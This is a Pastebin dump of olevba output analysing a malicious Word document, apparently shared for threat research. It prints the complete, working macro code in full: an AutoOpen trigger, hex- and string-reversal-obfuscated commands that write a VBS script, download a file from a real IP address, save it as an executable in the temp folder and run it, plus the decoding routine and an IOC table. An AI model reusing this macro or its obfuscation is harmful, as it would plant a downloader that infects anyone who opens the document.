Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIH-- vm1993lvw.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: vm1993lvw.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- sdf
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub sdf()
- jFHGVCsdf = HJbjbkljgIUGI("406563686f20677975465946477569676464642e53656e643e3e677975465946477569672e766273202620406563686f2053657420656e7669726f6e6d656e7456617273203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22292e456e7669726f6e6d656e74282250726f6365737322293e3e677975465946477569672e766273202620406563686f2074656d70466f6c646572203d20656e7669726f6e6d656e7456617273282254454d5022293e3e677975465946477569672e766273202620406563686f2046696c656f70656e203d2074656d70466f6c646572202b20225c646673646666662e657865223e3e677975465946477569672e766273202620406563686f207769746820625374726d3e3e677975465946477569672e766273202620406563686f202020202e74797065203d2031203e3e677975465946477569672e766273202620406563686f20202020202e6f70656e3e3e677975465946477569672e766273202620406563686f20202020202e777269746520677975465946477569676464642e726573706f6e7365426f64793e3e677975465946477569672e766273202620")
- JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("026202372667e276965774649564579776e3e35637c6166402c222669676e24303567616d696f297d687a73716f2837313e2934313e29333e2538313f2f2a3074747862202c2224554742202e65607f4e24646467696577464956457977602f686365604026202372667e276965774649564579776e3e39222d61656274735e22646f646142282473656a626f656471656273602d302d6274735260247563502a3d62747352602d6964602f686365604026202372667e276965774649564579776e3922205454584c4d485e24766f637f6273696d42282473656a626f656471656273602d302464646769657746495645797760247563502a34646467696577464956457977602d6964602f6863656040236f202568756e246d636"))
- GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
- sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
- Shell sdddd, 0
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object (obfuscation: |
- | | | Hex) |
- | Suspicious | SaveToFile | May create a text file (obfuscation: |
- | | | Hex) |
- | Suspicious | Open | May open a file (obfuscation: Hex) |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command (obfuscation: Hex) |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command (obfuscation: Hex) |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) (obfuscation: Hex) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) (obfuscation: Hex) |
- | Suspicious | CreateObject | May create an OLE object (obfuscation: |
- | | | StrReverse+Hex) |
- | Suspicious | ADODB.Stream | May create a text file (obfuscation: |
- | | | StrReverse+Hex) |
- | Suspicious | Open | May open a file (obfuscation: |
- | | | StrReverse+Hex) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: StrReverse+Hex) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | IOC | gyuFYFGuig.vbs | Executable file name (obfuscation: Hex) |
- | IOC | dfsdfff.exe | Executable file name (obfuscation: Hex) |
- | IOC | cscript.exe | Executable file name (obfuscation: Hex) |
- | IOC | http://185.39.149.17 | URL (obfuscation: StrReverse+Hex) |
- | | 8/aszxmy/image04.gif | |
- | IOC | 185.39.149.178 | IPv4 address (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | cmd.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | gyuFYFGuig.vbs | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
- Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
- JvigRuKAuHzAIK17 = 2912
- For CqINRagdDXnLii12 = 0 To 65
- JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
- DoEvents
- Next CqINRagdDXnLii12
- For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
- UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
- ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
- Next TQmHIRcQAPjC
- HJbjbkljgIUGI = ePUuigaspLiGL
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement